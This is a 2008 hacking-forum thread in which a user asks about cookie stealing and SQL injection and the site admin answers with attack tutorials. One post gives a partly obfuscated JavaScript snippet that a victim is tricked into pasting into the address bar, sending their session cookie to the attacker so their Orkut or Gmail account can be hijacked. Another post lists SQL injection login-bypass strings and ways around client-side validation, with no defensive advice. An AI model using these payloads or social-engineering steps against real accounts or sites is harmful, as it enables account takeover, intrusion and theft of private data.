::incrediblearena::
Thank you...for visiting our site.
hope u enjoy it.
for further info just mail : gkd_619@rediffmail.com


This is a Official forum of www.incrediblearena.co.nr
 
HomeFAQSearchRegisterLog inGallery
Log in
Username:
Password:
Log in automatically: 
:: I forgot my password
Similar topics
Poll
Why you want to be a Hacker
Money
25%
 25% [ 16 ]
Revenge
19%
 19% [ 12 ]
Security developer
27%
 27% [ 17 ]
Want 2 be a g33k god
22%
 22% [ 14 ]
etc etc
8%
 8% [ 5 ]
Total Votes : 64
Latest topics
» SilverMU season 6
Fri Apr 29, 2011 3:12 pm by ArcSky

» WINDOWS 8 M1 [Leaked] [Dwnld]
Sun Apr 17, 2011 1:46 am by admin

» thousands of working email id's
Thu Jan 27, 2011 12:38 am by admin

» zuckerberg-fan-page-hack [news]
Wed Jan 26, 2011 10:54 pm by admin

» Dhobi Ghat (Direct Download)
Wed Jan 26, 2011 1:18 am by admin

» Saw All Parts [Resume Support High Speed Downloads]
Wed Jan 26, 2011 1:03 am by admin

» USB Hidden Copier
Wed Jan 26, 2011 12:56 am by admin

» Free e-books
Tue Jan 25, 2011 11:22 pm by admin

» Free Reliance Internet [Simple & eazy]
Tue Jan 25, 2011 11:08 pm by admin

PCARENA
Visitor
web track

Share | 
 

 request for help abt cookie stealing and sql injection

Go down 
AuthorMessage
Manoos Ajnabi
Senior member
Senior member


Male
Number of posts : 5
Age : 31
Location : near from far and far form near
Job/hobbies : poetry, knowlege abt omputer
Humor : gentle
Points : 11613
Registration date : 2008-03-12

PostSubject: request for help abt cookie stealing and sql injection   Mon May 26, 2008 2:06 pm

bro i wanted knowledge and procedure abt cookie stealing and sql injection........it would be better if u help me in protection against it....
thanx....


regards
manoos ajnabi
Back to top Go down
View user profile
admin
Admin
Admin
avatar

Male
Number of posts : 106
Age : 33
Location : internet
Job/hobbies : website devloping
Points : 11730
Registration date : 2008-02-27

PostSubject: cookies stealling.   Mon May 26, 2008 11:54 pm

"Hacking orkut or Gmail" With the Help of Cookies or by "stealing cookies of the victim
By going through this post i hope you will understand how easy has hacking become with the help of cookies.

By this post you'll be learning cookie stealing and Hacking orkut Or Gmail account.

Procedure to hack gmail or orkut through mozilla by stealing cookies:-

1.Firstly you need have Mozilla firefox
2.Download cookie editor plugin for Mozilla firefox
3.You need to have two fake accounts to Hack Orkut or Gmail , So that you have to receive cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts


Cookie Script:

javascript:nobody=replyForm;nobody.toUserId.value=xxxxxxx;
nobody.scrapText.value=document·cookie;nobody.action='scrapbook.aspx?
Action.submit';nobody.submit()


How to use cookies script?

1. Replace your number "UserId.value=xxxxxxxx"
How to Replace your Number
1. Go to your album
2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
3. Now replace your value with the value in the java script

Your script will look like

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()

2.Now send this Cookie script to the victim and ask him to paste in Adress bar and Press enter
3.You'll Get his cookie in your scrap book
4.After Getting a cookie go to your orkut Home page , Then clik on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor)
5.click filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Script
put ur eight digit number in the place of (33444211)

Thats it your done With.
Logout of your orkut and login again and you'll be in your victims Homepage.


Note: cookies stealling software will upload to the site soon.
& for other site source code also. bounce bounce bounce bounce bounce bounce

_________________
ADMIN
Back to top Go down
View user profile http://www.incrediblearena.co.cn
admin
Admin
Admin
avatar

Male
Number of posts : 106
Age : 33
Location : internet
Job/hobbies : website devloping
Points : 11730
Registration date : 2008-02-27

PostSubject: bypass login by sql   Mon May 26, 2008 11:57 pm

Bypass login by sql injection!
For those of you who don’t already know SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user provided parameters, and can therefore embed SQL commands inside these parameters. the result is that the attacker can execute arbitrary SQL queries and commands on the backend database server through the Web application.

A database is a table full of private and public site information such as usernames, products, etc. They are fundamental components of Web applications. Databases enable Web applications to store data, preferences and content elements. Using SQL web applications interact with databases to dynamically build customized data views for each user.

Data types:
mysql.user
mysql.host
mysql.db

SQL commands:
ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table

DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction

EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction

SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database

Bypassing login scripts:

SQL injection strings and the DB doesnt matter.

') OR ('a' = 'a
') OR ('1'-'1
'or''='
' OR '1=1
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 *
" or 0=0 *
or 0=0 *
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
or a=a--
' or 1=1--
1' having '1'='1'--
' or 'x'='x--
foo'+OR+'1'='1

Note: having 1=1--

Example:

Login: hi'or 1=1--
Password: hi'or 1=1--

Bypassing input validation!

The input validation can also be bypassed bcz of the bad programming techniques.In most of the websites input validation is done at the client end i.e at the browser end using JAVASCRIPT. what u can do is open the page and then save the page in ur hard disk.Then open the HTML page in any HTML editor (say Frontpage or Dreamweaver or even notepad) and delete the code of input validation code of JAVA script and then simply go ahead...........


Basketball Basketball Basketball Basketball Basketball Basketball Basketball Basketball Basketball

_________________
ADMIN
Back to top Go down
View user profile http://www.incrediblearena.co.cn
mudassir
Junior Member
Junior Member


Number of posts : 2
Points : 11397
Registration date : 2008-05-23

PostSubject: Re: request for help abt cookie stealing and sql injection   Wed Jul 02, 2008 5:27 pm

i think they have a cure for this method..as i am unable to c the digits code of pic\


do u know other working ways??

and also give examples of sql injection technique

thanx in advance
Back to top Go down
View user profile
gkd_619
Super Moderator
Super Moderator
avatar

Male
Number of posts : 34
Age : 34
Location : internet
Job/hobbies : Trying My Best
Humor : I M Wht I M
Points : 11550
Registration date : 2008-04-05

PostSubject: check   Tue Jul 29, 2008 10:41 pm

mudasir check this site....

[You must be registered and logged in to see this link.]

peace & cheers
Back to top Go down
View user profile http://www.gkd619.co.nr
Sponsored content




PostSubject: Re: request for help abt cookie stealing and sql injection   

Back to top Go down
 
request for help abt cookie stealing and sql injection
Back to top 
Page 1 of 1
 Similar topics
-
» image edit request please read
» How to capture an AJAX request with SeleniumRC test?
» User Bar Request
» SPECIAL REQUEST: CAN ANYONE FIND AN EXAMPLE OF THE MCCANNS MENTIONING PITCHFORKER PROFILER'S NAME?
» What are your guilty pleasures?

Permissions in this forum:You cannot reply to topics in this forum
::incrediblearena:: :: HARDCORE ARENA :: HELP DESK-
Jump to: